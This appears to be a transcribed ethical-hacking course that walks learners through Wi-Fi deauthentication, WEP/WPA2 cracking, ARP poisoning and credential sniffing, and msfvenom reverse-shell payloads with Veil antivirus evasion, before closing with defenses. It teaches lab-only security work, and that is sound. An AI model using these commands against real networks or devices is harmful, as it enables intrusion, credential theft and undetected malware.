Mastering Network Hacking from Beginner to Pro. Course 1. The Foundation. Beginner Level. Introduction to Course 1. Welcome to the first course in our series, The Foundation. The objective of this course is to build a rock-solid foundation in network security and ethical hacking. By the end of this course, you will understand the what and the why behind network attacks, be able to set up a safe virtual lab environment, and perform basic network reconnaissance without ever needing to connect to a target. We assume you have no prior knowledge. Every concept will be explained with simple language and real-world analogies. Our goal is not to make you a hacker yet, but to build the essential knowledge base upon which all future skills will rest.
Module 1. Foundations of Network Security and Ethical Hacking. Introduction to Module 1. This foundational module establishes the ethical and conceptual groundwork for the entire series. You will learn the core vocabulary and the fundamental principles that separate an ethical hacker from a criminal.
Lesson 1.1, Introduction and the Need for Security. Welcome to the start of your journey. Before we type a single command, we must understand why we are here. Imagine a locksmith. A locksmith learns how to pick locks, not to break into homes, but to help people who are locked out and, more importantly, to understand how locks can be improved to make homes safer. In this course, we are learning to become digital locksmiths. We study the attacker's methods to build stronger defenses, protecting data, privacy, and infrastructure. This lesson is our oath, a commitment to use these powerful skills for good. The digital world is divided into three main types of hackers, defined by their intent. First, the white hat hacker. This is our goal. A white hat is a security professional who is ethically and legally paid to find vulnerabilities in systems. They are the digital locksmiths, hired by companies to test their security before the criminals do. They operate with permission and report their findings to help fix the flaws. Second, the black hat hacker. This is the adversary. A black hat is a malicious actor who exploits vulnerabilities for personal gain, such as stealing data, causing damage, or demanding ransom. They operate illegally and without permission. Third, the gray hat hacker. This individual sits in the middle. They might find a vulnerability without permission, but will report it to the company, sometimes for a bug bounty or just for the challenge. Their actions can be legally ambiguous, as they did not have prior consent. Our entire course is focused on the mindset, tools, and ethics of the white hat hacker. We will learn to think like a black hat to provide the defense of a white hat. Now for your activity for this lesson. Open a simple text editor like Notepad or TextEdit and write a one-paragraph personal statement. Start with the sentence, "My goal in learning network security is to," and complete it by outlining your commitment to using this knowledge ethically and legally. This is not for submission, it is for you. It is your personal contract to uphold the principles of a white hat hacker. The resource for this lesson is an article titled The EC Council Code of Ethics for Certified Ethical Hackers. This is the industry standard we will adhere to. You can find it by searching online. To check your understanding, here is a question. What is the primary difference between a black hat and a white hat hacker? The ideal answer is the primary difference is permission and intent. A white hat hacker has explicit permission to test a system's security with the intent of helping the organization improve it. A black hat hacker acts without permission and with malicious intent, such as for personal gain or to cause harm.
Lesson 1.2. Core Networking Concepts. Before we can learn how to attack or defend a network, we must understand what a network is. Thinking you can hack a network without this knowledge is like trying to navigate a city without knowing what streets, buildings, or traffic lights are. This lesson is our map and our legend. We will learn the basic language of networking so we can understand the digital city we are about to explore. Let's use the analogy of a postal service to understand a network. First, the IP address. This is like your home address. Every device on a network, like your phone or laptop, needs a unique address so that data can be sent to and from it. This is called an IP address. Second, the router. This is like the post office. The router is the central hub of your local network. Its job is to direct traffic. When you want to visit a website, your request goes to the router first, which then figures out the best way to send your request out to the internet. Third, the switch. This is like the mail sorter. A switch is a component, often built into your router, that manages traffic inside your local network. If your laptop wants to send a file to your printer, the switch ensures that data goes directly to the correct device. Fourth, the gateway. This is like the post office exit. The gateway is the router's address on the internet. It's the single door through which all traffic from your home network leaves to go to the outside world. For your activity, grab a piece of paper and a pen. Draw a simple diagram of your home network. Start with a cloud labeled Internet, draw a box for your router, and connect it to the internet. Now, draw lines from your router to other boxes representing your devices, like my laptop, my phone, and so on. Label the path a request would take from your laptop to the internet. The resource for this lesson is a video titled How the Internet Works, Network Basics. A quick search will provide several excellent visual explanations of these concepts. To check your understanding, here is a two-part quiz. Question 1. What is the main purpose of an IP address? A. To power the device. B. To provide a unique identifier for a device on a network. C. To store files. The correct answer is B. An IP address provides a unique identifier. Question 2. What is the function of a network gateway? A. To block all internet traffic. B. To connect two devices on the same network. C. To act as an exit and entry point between a local network and the internet. The correct answer is C. The gateway is the exit and entry point to the internet.
Module 2. Setting up the hacking lab. This module will guide you through building a safe and isolated laboratory. You will learn to use virtualization software to create a dedicated environment where you can practice all the techniques in this course legally and without any risk to your own or others' computers. Lesson 2.1: Virtualization Software Installation. Imagine you want to learn how to dismantle a car engine. You wouldn't start with your brand new family car. You'd get a cheap old engine to practice on in your garage. A virtual lab is our practice engine. It's a completely separate, disposable computer that runs inside your actual computer, called a virtual machine. We use virtualization software to create this lab so that if we break something, it doesn't affect our real machine. The software we'll use is called VirtualBox. It's a free and powerful tool that acts as a manager for our virtual machines. The key steps are to download VirtualBox from its official website, run the installer accepting the default options, and, if necessary, enable virtualization technology in your computer's BIOS or UEFI settings. For your activity, your task is to install VirtualBox. As you go through the process, keep a simple text file open and write down each major step you take. This practice of documentation is a critical skill for a security professional. The resource for this lesson is the official VirtualBox installation guide, which can be found on their website. To check your understanding, simply confirm that the installation was successful. You will know it worked if you can open the VirtualBox Manager interface. Seeing this main window means you are ready for the next step. Lesson 2.2: Kali Linux Setup and Configuration. Now that we have our garage, which is VirtualBox, we need our toolset. Kali Linux is the industry standard operating system for ethical hacking. It's a version of Linux that comes preloaded with hundreds of security tools. In this lesson, we will install our workshop into our virtual garage. We will install Kali Linux as a virtual machine inside VirtualBox. The key steps are, first, download the VirtualBox image of Kali Linux from the official Kali website. This is a pre-made version that makes installation much easier. Second, in VirtualBox, go to File, then Import Appliance, and select the Kali Linux file you downloaded. Third, accept the default settings. The most important setting is the network adapter, which should be set to NAT. NAT, or Network Address Translation, gives your virtual machine a private, secure line to the internet through your main computer. Finally, start the new Kali Linux virtual machine. The default username and password are typically Kali and Kali. For your activity, follow the steps to import and run your Kali Linux virtual machine. Once you are logged in, open the web browser inside Kali and navigate to a website like google.com. This will confirm your network settings are correct and that your virtual lab has internet access. The resource for this lesson is the official Kali Linux virtual machine installation walkthrough, which provides a detailed guide with screenshots. Your successful completion of this lesson is confirmed by being at the Kali Linux desktop and able to browse the web from within the virtual machine.
Lesson 2.3, Mastering the Kali Linux Terminal. Many of the most powerful hacking tools are run from the terminal, also known as the command line. The terminal is our chef's knife. Learning it is non-negotiable for efficiency and power. Let's learn 4 essential commands. First, ls, which stands for list. This command lists all the files and folders in your current directory. Second, cd, which stands for change directory. This command is used to move into a different folder. For example, cd documents would move you into the documents folder. Third, mkdir, which stands for make directory. This command creates a new empty folder. For example, mkdir my work creates a folder named my work. Fourth, sudo apt update. This is a very important command. Sudo means run this command with administrative privileges, and apt update tells the system to refresh its list of available software. You will use this often to keep your system and tools up to date. For your activity, let's complete a terminal challenge. Open your terminal and type the following commands, pressing Enter after each one. 1. mkdir hacking lab. 2. cd hacking lab. 3. echo my first file to notes.txt. 4. cat notes.txt. 5. ls. This sequence will create a directory, move into it, create a file with text, display the text, and then list the file in the directory. A useful resource is to search for a top 20 essential Kali Linux terminal commands cheat sheet online. To check your understanding, here is a short quiz. Question 1. Which command is used to see the contents of your current location? A. cd, B. ls, C. mkdir. The correct answer is B. ls. Question 2. What is the purpose of the sudo command? A. To delete files, B. To run a command with administrative privileges, or C. To search the internet. The correct answer is B. To run a command with administrative privileges. Module 3, Pre-Connection Attacks, Reconnaissance and Sniffing. Introduction to Module 3. This module will help you master the art of information gathering. You will learn how to gather critical data about surrounding networks without connecting to them. This is the first and most crucial phase of any network attack. Lesson 3.1,
MAC addresses and wireless modes. Every network device has a unique physical address burned into its hardware, called a MAC address. Think of it as the device's fingerprint. For a hacker, this is a problem because it can be used to trace activity. Therefore, one of the first steps is to change this fingerprint to something anonymous. This is called MAC spoofing. In Kali, we can change our MAC address using a few terminal commands. First, identify your wireless card by typing ifconfig. Your wireless card will likely be named WLAN0. Second, take the interface down with the command sudo ifconfig WLAN0 down. Third, change the MAC address using the MAC changer tool. To get a random MAC, use sudo MAC changer r WLAN0. Fourth, bring the interface back up with the command sudo ifconfig WLAN0 up. Finally, verify the change by running ifconfig again. For your activity, practice this 5-step process 3 or 4 times. Get comfortable with the sequence of taking the interface down, changing the address, and bringing it back up. For more background, search for a tutorial titled Understanding and Spoofing MAC Addresses. To confirm your understanding, run the command ifconfig after spoofing your MAC address. The output should show the new randomized MAC address, confirming the procedure was completed correctly. Lesson 3.2, Setting up Monitor Mode for Reconnaissance. By default, your wireless card operates in managed mode, meaning it only listens to conversations it is a part of. To be an effective information gatherer, we need to put it into monitor mode. This special listening mode allows us to see all the raw Wi-Fi data flying through the air around us. In Kali, we use the Aircrack-ng tool for this. First, identify your wireless interface, for example, WLAN0. Second, start monitor mode with the command sudo Aircrack-ng start WLAN0. This command will often create a new interface name like WLAN-o-mon. Third, verify the change by running the command iwconfig. The new interface should be listed with its mode as monitor. It's important to note that not all wireless cards support monitor mode. You may need a compatible USB wireless adapter for this course. For your activity, execute the commands to put your wireless card into monitor mode. Then practice returning it to managed mode by running sudo Aircrack-ng stop WLAN-o-mon. Switch back and forth between the two modes until you are comfortable. A helpful resource is a guide on choosing the right wireless adapter for hacking. To assess your work, run the iwconfig command. The output for your wireless interface, for example, WLAN-o-mon, should clearly show mode monitor. Lesson 3.3, Packet Sniffing and Targeted Reconnaissance. Now that our wireless card is in monitor mode, we can start listening. We need a tool that can help us make sense of all the network noise around us. That tool is Aircrack-ng. First, ensure you are in monitor mode. Second, start a broad scan by typing sudo Aircrack-ng WLAN0mon. Your screen will fill with information. The key columns are BSSID, which is the router's MAC address, and ESSID, which is the network's name. Third, once you've identified your own test network, press Ctrl-C to stop the scan. Fourth, perform a targeted scan with the command sudo Aircrack-ng space hyphen hyphen BSSID, space BSSID of target, space hyphen hyphen channel, space channel of target, space hyphen hyphen write underscore capture underscore file, space WLAN0mon. This command tells Aerodump to listen only to that specific network and save everything it captures. For your activity, run a broad scan with Aircrack-ng. Identify your own test network, note its BSS ID and channel. Then, stop the scan and run a new targeted scan. Let it run for a minute and watch as it shows your own devices connecting. For more information, search for the documentation on AeroDump NG usage and output explanation. To assess your work, you should be able to see the AeroDump NG interface running in targeted mode. The top part should list your target BSS ID, and the bottom part should list at least one client device associated with it. Lesson 3.4. The deauthentication attack. A deauthentication attack is used to disconnect a device from a network. It works by sending a fake disconnect message. This is useful to kick someone off a network, or, more strategically, to force a device to reconnect so we can capture its credentials, which we will cover later. The tool we use is Aircrack-ng. You will need 3 pieces of information from your targeted AeroDump NG scan: the BSS ID of the router, the MAC address of the client device you want to disconnect, and your monitor mode interface name. The command is structured as follows: sudo airplay-ng -deauth 0-a BSS ID of router -c MAC address of client WLAN 0 mon. The -deauth 0 part tells the tool to send a continuous stream of deauthentication packets. For your activity, this is a hands-on exercise. Target your own phone or another device on your own test network. With AeroDump NG running in one terminal, execute the deauthentication attack from a second terminal. Watch your phone's Wi-Fi connection drop. Stop the attack and watch it reconnect. A useful resource is an article explaining how deauthentication attacks work and their defense. To confirm your understanding, you will know the attack is working when you observe the target device disconnect. The confirmation in the terminal is the output from Airplay-ng, which will print a line for each deauthentication packet it sends.
Course 2, The Practitioner, Intermediate Level. Introduction to Course 2. Welcome to the second course, The Practitioner. The objective here is to build practical, hands-on skills in network penetration. This course focuses on the how. You will learn to exploit legacy and modern Wi-Fi security protocols to gain access, and then leverage that access to intercept and analyze network traffic. We assume you have mastered the foundational concepts from Course 1. Module 4, Gaining Access, Cracking WEP Networks. Introduction to Module 4. This module will help you understand and exploit the fundamental flaws of the outdated WEP protocol. While rarely seen today, studying WEP is a perfect academic exercise to learn the principles of cryptographic attacks and packet injection.
Lesson 4.1. WEP Cracking Theory and Introduction. WEP, or Wired Equivalent Privacy, was the first security protocol for Wi-Fi. It failed spectacularly due to a flawed cryptographic implementation. We study it today because the process of breaking it teaches the core concepts of capturing, analyzing, and injecting packets. The central flaw in WEP lies in its use of something called an initialization vector, or IV. WEP uses a short 24-bit IV that is sent in plain text with every data packet. Because this IV is so short, it is guaranteed to be reused quickly. A clever statistical attack discovered that by collecting a large number of these IVs, you can find weak ones that leak information about the secret encryption key. Our attack plan is to capture thousands of these IVs, generate more by injecting packets, and then use a tool to mathematically derive the WEP key. For your activity, write a short summary explaining the role of the initialization vector in the WEP cracking process. Focus on why the reuse of IVs is the core of the vulnerability. For deeper reading, search for the research paper titled The FMS Attack on WEP. To check your understanding, answer this question. In one sentence, why is WEP considered fundamentally insecure? The ideal answer is WEP is fundamentally insecure because its use of short, reusable initialization vectors in plain text allows an attacker to collect enough data to statistically deduce the secret encryption key. Lesson 4.2: Fake Authentication and Packet Injection. Our attack plan requires us to inject packets, but most networks will ignore packets from a device that isn't connected. So our first step is to trick the network into thinking we are a legitimate client. This is called fake authentication. Once the network associates with us, we will use an ARP request reply attack to generate a flood of new IVs for us to capture. This is a two-step process using Aircrack-ng in two separate terminals. In the first terminal, you will run aerodump-ng in targeted mode to capture all the packets we generate. The command is sudo aerodump-ng --bssid --channel --write web crack wlan 0 mon. In the second terminal, you will first perform fake authentication with the command sudo airplay-ng --fake off 6000 -a bssid -h your spoofed MAC wlan 0 mon. Once associated, you will begin packet injection with the command sudo airplay-ng -arp replay -b bssid -h your spoofed MAC wlan 0 mon. You will know this is working by looking at your aerodump-ng window. The number in the #data column should start increasing very rapidly. For your activity, set up a WEP-enabled test network. Execute the full workflow, start aerodump-ng capture, perform fake authentication, and then perform the ARP request replay attack. Let it run until you have at least 25,000 data packets. For a visual guide, search for a tutorial on generating IVs with ARP request replay attack. To assess your work, look for two visual indicators. In the Airplay-ng terminal, you will see a message, Association Successful. In the Aerodump-ng terminal, the #data column for the target network will begin to increase at a very high rate. Lesson 4.3: Fragmentation and Key Recovery. The ARP replay attack requires waiting for a legitimate client to send a packet. A more advanced technique, the fragmentation attack, works even on an empty network. It generates the IVs we need on demand. Once we have enough IVs from either attack, we can finally crack the key. The fragmentation attack is a more complex multi-step process using Airplay-ng and PacketForge-ng to generate an injectable packet. However, the final step of cracking the key is the same for both methods. You will use the tool Aircrack-ng. Once you have enough data packets captured in your .cap file, you stop the attacks and run the command Aircrack-ng your capture file .cap. The program will analyze the IVs in the file. If it has enough data, it will test keys until it finds the correct one and displays it on the screen with the message, Key Found. For your activity, use the capture file you generated and crack the key. Then, use the recovered web key to connect to your test network from another device to prove it's correct. For more details, refer to the Aircrack-ng web cracking guide in their official documentation. To check your understanding, what is the final command you use to find the web key, and what file does it operate on? The ideal answer is, the final command is Aircrack-ng, and it operates on the .cap capture file generated by aerodump-ng.
Module 5: Gaining Access, Cracking WPA and WPA2 Networks. Introduction to Module 5.
This module will help you understand and execute attacks against modern Wi-Fi security standards. You will learn that WPA and WPA2 are not cracked in the same way as WEP. Instead, we attack the password itself. Lesson 5.1 WPA, WPA2 Cracking Theory and WPS Exploitation. WPA and WPA2 were designed to fix the security holes in WEP. They use stronger encryption and a process called the four-way handshake to connect clients securely. Because of this, we cannot use the same statistical attacks. The weak link is no longer the cryptography, it's the human-chosen password. Our attack is to capture the four-way handshake that happens when a client connects. We can then try to crack it offline using a dictionary attack. This involves taking a huge list of possible passwords and trying each one until we find a match. Another vulnerability exists in Wi-Fi Protected Setup, or WPS. This feature uses an 8-digit PIN that is checked in 2 halves, making it susceptible to a brute force attack. Tools like Reaver can automate this process. This is why WPS should always be disabled. For your activity, research the WPS protocol. Find out what the 8th digit of a WPS PIN is used for. A great resource to learn more is an article about the Reaver attack and the WPS vulnerability. To check your understanding, what is the primary security mechanism in WPA, WPA2 that we aim to capture and attack? A, the initialization vector, B, the WPS PIN, C, the four-way handshake, D, the MAC address. The correct answer is C, the four-way handshake.
Lesson 5.2, Capturing the WPA/WPA2 handshake. Our entire WPA/WPA2 attack hinges on capturing that four-way handshake. The handshake only happens when a device connects, so we need to force it to happen. This lesson combines packet sniffing and the de-authentication attack to capture the handshake on demand. The workflow requires 2 terminals. In the first terminal, start AeroDumpNG in targeted mode to sniff and save the packets to a file. Make sure at least one client is already connected to the network. The command is sudo AeroDumpNG --BSSID --channel ch --write WPA_handshake WLAN0mon. In the second terminal, execute a de-authentication attack targeting that specific client. Only send a few packets, just enough to force a reconnect. The command is sudo airplay-ng -deauth4-a bssid-c client_mac WLAN0mon. Immediately after running the deauth attack, look at your AeroDumpNG window. In the top right corner, you should see a message appear, WPA handshake, followed by the BSSID. This confirms you have captured the handshake. For your activity, set up a WPA2 protected test network and connect a device to it. Execute the full workflow. Your goal is to successfully see the WPA handshake message appear in the AeroDumpNG window. For a step-by-step guide, search for a tutorial titled How to Capture a WPA/WPA2 Handshake. To assess your work, you can verify your capture file using Aircrack-ng. Running Aircrack-ng on your capture file will show 1 handshakes in its output if the capture was successful.
Lesson 5.3, Cracking the Key with Dictionary Attacks. We have captured the handshake. Now we need the password. A dictionary attack uses a simple text file called a word list, where each line is a potential password. We will use a tool to automate trying every password in the list against the handshake. The primary tool is Aircrack-ng. First, you need a word list. Kali Linux comes with some, but you can also download famous ones like rockyou.txt or create your own small custom list for this exercise. Second, run the attack with the command aircrack -ng, path to the cap file, -w, path to the word list. Aircrack-ng will go through your word list one by one. If it finds a match, it will stop and display key found, followed by the correct password. For your activity, use the handshake file you captured in the previous lesson. Create a small, custom word list, making sure the correct password is in it. Execute the aircrack-ng command and successfully crack the key. A helpful resource is a guide on creating and optimizing word lists for password cracking. To check your understanding, here is a question. You run a dictionary attack that finishes but does not find the key. What is the most likely reason for this failure? The ideal answer is the correct password was not included in the word list you used.
Module 6, Post-Connection Attacks, MITM and Data Interception. Introduction to Module 6. This module will teach you how to leverage network access to become a man in the middle, or MITM. You will learn to position yourself between a target device and the router, allowing you to inspect all traffic passing between them.
Lesson 6.1, Network Reconnaissance, Post-Connection. You've successfully gained access to the network. Now you need to perform internal reconnaissance to create a map of the local network. Who else is connected? What devices are they using? We will use two primary tools. First, NetDiscover. This tool is a fast way to find all active hosts on your local network. The command is sudo netdiscover-r your network range. The output will be a live list of all IP and MAC addresses on the network. Second, Nmap, or its graphical front end, Zenmap. Nmap is a powerful network scanner. Once you have an IP address from NetDiscover, you can perform a much more detailed scan on that specific target. The command is nmap-sv-o target IP. The output will tell you the operating system, what ports are open, and the services running on those ports. For your activity, connect your Kali VM to your test network. Run NetDiscover to find all the devices. Pick one device's IP address and run a targeted Nmap scan against it. Analyze the results. The resource for this lesson is the official Zenmap Nmap Basic Scanning Techniques documentation. To check your understanding, what two key pieces of information can a basic Nmap scan provide that NetDiscover cannot? The ideal answer is Nmap can provide the target's operating system and a list of its open ports along with the services running on them.
Lesson 6.2, ARP Poisoning Theory and Execution. ARP poisoning, or ARP spoofing, is an attack where we trick a target device and the router into sending their traffic to us instead of to each other. We lie to both of them, telling the target that we are the router and telling the router that we are the target. This positions us as the man in the middle. We use the ARP spoof tool. The workflow is as follows. First, you must enable IP forwarding on your Kali machine. This tells it to act like a router and forward packets instead of dropping them. The command is echo 1 greater than /proc greater than sys greater than net greater than IP v4 greater than IP underscore forward. Second, you will need two terminals. In the first terminal, you will poison the target device with the command sudo arpspoof-i interface -t target IP gateway IP. In the second terminal, you will poison the router with the command sudo arpspoof-i interface -t gateway IP target IP. You must leave both terminals running for the attack to work. For your activity, choose your phone as the target. Enable IP forwarding and execute the two ARP spoof commands in separate terminals. Pick up your phone and try to browse the web. If it still works, your attack is successful.
For more information, search for an article titled Understanding ARP and the ARP Spoofing Attack. To check your understanding, what is the purpose of enabling IP forwarding before launching an ARP spoof attack? The ideal answer is to ensure that your attacking machine forwards the redirected traffic to its correct destination, preventing a denial of service and allowing the man-in-the-middle attack to be transparent.
Lesson 6.3 Traffic Analysis with Wireshark. We are now the man in the middle. We need a tool to see the data flowing through us. Wireshark is the world's foremost network protocol analyzer. It is a digital microscope for network traffic. The workflow is as follows. First, launch your ARP spoofing attack. Second, launch Wireshark in Kali and select your network interface to start capturing. Third, on your target device, go to a website that uses HTTP for its login, not HTTPS. Enter a fake username and password. Fourth, in Wireshark, apply a display filter. Type http.request.method=post and press Enter. This will filter the packets down to only those containing data being submitted from a form. Fifth, click on the post request packet and inspect its details. You will be able to see the username and password in plain text. For your activity, execute the full man-in-the-middle attack. Run ARP spoof, start Wireshark, and log in to an HTTP test page from your target device. Use the Wireshark filter to find the login packet and view the plain text credentials. For more help with filters, search for a Wireshark Filters for Beginners tutorial. To check your understanding, why is this attack only effective on unencrypted HTTP traffic and not on encrypted HTTPS traffic? The ideal answer is, with HTTPS, the data is encrypted between the user's browser and the server. Even though we can capture the packets, the content is scrambled and unreadable without the encryption key.
Course 3. The Strategist. Expert Level. Introduction to Course 3. Welcome to the final course, The Strategist. The objective is to achieve strategic mastery of network penetration and defense. This course focuses on the why at a strategic level and the what if. You will learn to move beyond simple data sniffing to gaining control of systems, understanding the full attack lifecycle, and, most importantly, how to defend against these advanced threats. Module 7. Post-Connection Attacks, Payloads and System Control. Introduction to Module 7. This module will help you understand the endgame of many network attacks, gaining remote control over a target system. You will learn to create, disguise, and deliver payloads to establish a command and control channel. Lesson 7.1. Backdoors and Payloads Basics. A backdoor is a piece of software that allows an attacker to connect to and control a machine remotely. The payload is the part of an exploit that carries out the malicious action, such as installing this backdoor. Payloads come in two primary flavors. First, a bind payload. This payload opens a listening port on the victim's machine and waits for the attacker to connect to it. This is often blocked by firewalls. Second, a reverse payload. This payload actively connects from the victim's machine back to the attacker's machine. The attacker sets up a listener and waits for the victim to call home. This is far more effective in the real world, as it can bypass most simple firewall rules. For your activity, diagram the network flow for both a bind and a reverse payload on a piece of paper. Draw an attacker, a victim, and a firewall. Use arrows to show the direction of the connection for both scenarios. A key resource is the Metasploit Framework Payloads Explained Guide. To check your understanding, you are attacking a target inside a corporate network with a strict firewall. Which type of payload, Bind or reverse would you choose and why? The ideal answer is you would choose a reverse payload because corporate firewalls typically block unsolicited inbound connections, which would stop a bind payload, but are more permissive with outbound connections, which a reverse payload uses. Lesson 7.2: Creating and obfuscating payloads. Every antivirus product has a database of signatures for common malware. If we generate a standard payload, it will be instantly detected. The art of a successful attack lies in obfuscating it, modifying it so that it no longer matches any known signatures. We will use two tools, MSF Venom to generate the payload and Veil Evasion to obfuscate it. First, payload generation with MSF Venom. An example command to create a Windows reverse TCP payload is MSF Venom-P Windows/meterperder/reverse_TCP lhost equals your Kali IP, lport equals 4444-f-exe-o payload.exe. This command will create payload.exe, which would be instantly flagged by modern antivirus software. Second, obfuscation with Veil Evasion. Veil is a framework designed to generate payloads that bypass common AV solutions. You launch Veil, select a payload, set your options like lhost and lport, and generate. Veil will use various techniques to create a new executable that is hopefully undetectable. For your activity, generate a standard payload using MSF Venom. Then try to generate a similar payload using Veil. Compare the difference in file size and structure. For more details, search for the official documentation on using MSF Venom for payload generation. To check your understanding, what is the primary purpose of using a tool like Veil Evasion after generating a payload with MSF Venom? The ideal answer is to obfuscate the payload to evade detection by antivirus software by altering its structure and code to bypass signature-based detection. Lesson 7.3: Payload Delivery and Detection. Creating the payload is only half the battle. Now comes the most challenging part: delivery and execution. How do you get the target to run your code? This is the realm of social engineering. Once the payload is executed, it will connect back to our listener, giving us a remote shell. First, we set up the listener on the attacker side using the Metasploit Framework Console, or MSF console. The commands are use/multi/handler, set payload, Windows/meterpreter/reverse TCP, set lhost, your Kali IP, set lport 4444, exploit-j. This runs the listener as a background job waiting for an incoming connection. Second is delivery and execution. In the real world, this could be done through phishing, a fake website, or a USB drop. For our lab, we will simulate this by simply copying the payload file to a target Windows virtual machine and double-clicking it. When the payload is executed, you will see a message in your MSF console terminal: Meterpreter Session 1 opened. You can then interact with this session and take control of the remote machine. For your activity, execute the full attack chain in your lab. Generate a payload, set up the listener in Meterpreter, copy the payload to your target VM, and run it. Watch the session open and interact with it using commands like sysinfo. A useful resource is a tutorial on setting up a Meterpreter multi-handler. To check your understanding, you have launched your listener and the target has run your payload, but you never receive a connection back. What is the most likely technical reason for this failure? The ideal answer is the lhost variable in the payload was configured incorrectly.
If lhost was set to the wrong IP address, the payload will execute but will not know how to connect back to the attacker's machine.
Module 8, Defense, Ethics, and Real-World Case Studies. Introduction to Module 8. This final module helps you pivot from an offensive to a defensive mindset. Knowing how to attack is only useful if it informs how you defend. This module covers practical defensive measures, detection techniques, and analyzes real-world breaches. Lesson 8.1, Network Defense and Security Configuration. We have spent the course learning how to break things. Now we will learn how to build them securely. For every attack, there is a corresponding defense. For defense against Wi-Fi cracking, first, never use WEP. Second, use WPA2 or the newer WPA3 standard. Third, use a long, complex, and unique passphrase. Length is more important than complexity. Fourth, disable WPS on your router. Fifth, always choose AES encryption over the older TKIP. For defense against network sniffing, first, ensure you are using HTTPS everywhere. This encrypts web traffic. Second, use a VPN, or Virtual Network Private. This creates an encrypted tunnel for all of your device's traffic. For your activity, log in to your own home router's administration page. Go to the Wireless Security section. Verify that you are using WPA2, that AES encryption is enabled, and that WPS is disabled. If your password is weak, change it to a strong passphrase. A great resource is a guide on best practices for securing your wireless network. To check your understanding, a user has a complex 10-character password. You recommend a 20-character passphrase of 4 simple words. Why is your recommendation more secure? The ideal answer is, the sheer length of the passphrase dramatically increases the number of possible combinations to a point where a dictionary attack becomes computationally infeasible. For passphrases, length is a more critical security factor than complexity. Lesson 8.2, Detecting and Preventing ARP Poisoning. The ARP spoofing attack is silent. Detection relies on spotting duplicate or conflicting ARP replies on the network. For detection, tools like ARPWatch can monitor ARP activity and send an alert if a MAC address for a given IP suddenly changes. A security analyst can also use Wireshark to look for a flood of unsolicited ARP replies. For prevention, enterprise-grade switches have a feature called Dynamic ARP Inspection, or DAI. The switch maintains a trusted database of IP to MAC bindings and drops any ARP packet that doesn't match. On a high-security device, you can also program a static permanent ARP entry with the command ARP-S. For your activity, start an ARP spoofing attack from your Kali VM against your host machine. On your host machine, open a terminal and type ARP-A. Examine the ARP table. You should see that the MAC address for your router's IP is now the MAC address of your Kali machine. Stop the attack and run ARP-A again to see it revert to normal. A useful resource is an article on Tools and Techniques for Detecting ARP Spoofing. To check your understanding, what is the fundamental principle behind how ARPWatch and Dynamic ARP Inspection work? The ideal answer is, they both work by maintaining a trusted database of IP to MAC address pairings and treating any ARP packet that deviates from that trusted baseline as malicious. Lesson 8.3, Cyber Attack Case Studies and Conclusion. To truly understand the impact of cybersecurity, we must study real-world events. Let's look at the WannaCry ransomware attack of 2017. It was a massive global cyber attack that crippled hospitals, transport systems, and major corporations. It spread using an exploit called Eternal Blue, which targeted a vulnerability in an old version of the Windows SMB networking protocol. This allowed an attacker to remotely execute code on a vulnerable machine. The payload was the ransomware itself, which encrypted the user's files. The vulnerability had been patched by Microsoft a month before the attack. The organizations that were hit were the ones that had failed to apply this critical security update. For your activity, research another major cyber attack, such as the 2013 Target data breach. Write a short analysis identifying the initial attack vector, the damage caused, and the primary defensive failure. For more information, search for a technical analysis of the WannaCry ransomware attack. To check your understanding, a final comprehensive quiz. Question 1. What is the primary goal of putting a wireless card into monitor mode? Answer. To capture all raw Wi-Fi traffic in the air, not just traffic addressed to your machine. Question 2. Why is a reverse TCP payload generally more effective than a bind TCP payload? Answer. Because it initiates an outbound connection, which is more likely to be allowed by firewalls. Question 3. What is the single most effective defense against a WPA2 dictionary attack? Answer. Using a long, strong, and unique passphrase that is not in common word lists. Question 4. Based on the WannaCry case study, what is arguably the most critical defensive practice for any organization? Answer. Consistent and timely patch management to fix known vulnerabilities.
Course conclusion: the path forward. Congratulations! You have completed the entire mastery track from beginner to expert. You began by understanding the ethical why, built a lab, learned to gather information, gained access, intercepted traffic, and finally learned to take control of systems before pivoting to a defensive posture. You are no longer just a user of technology. You are someone who understands its underlying mechanics of trust and vulnerability. The skills you have learned are powerful, and with them comes great responsibility. Continue to learn, stay curious, practice ethically, and use your knowledge to build a more secure digital world. The journey of a security professional never truly ends.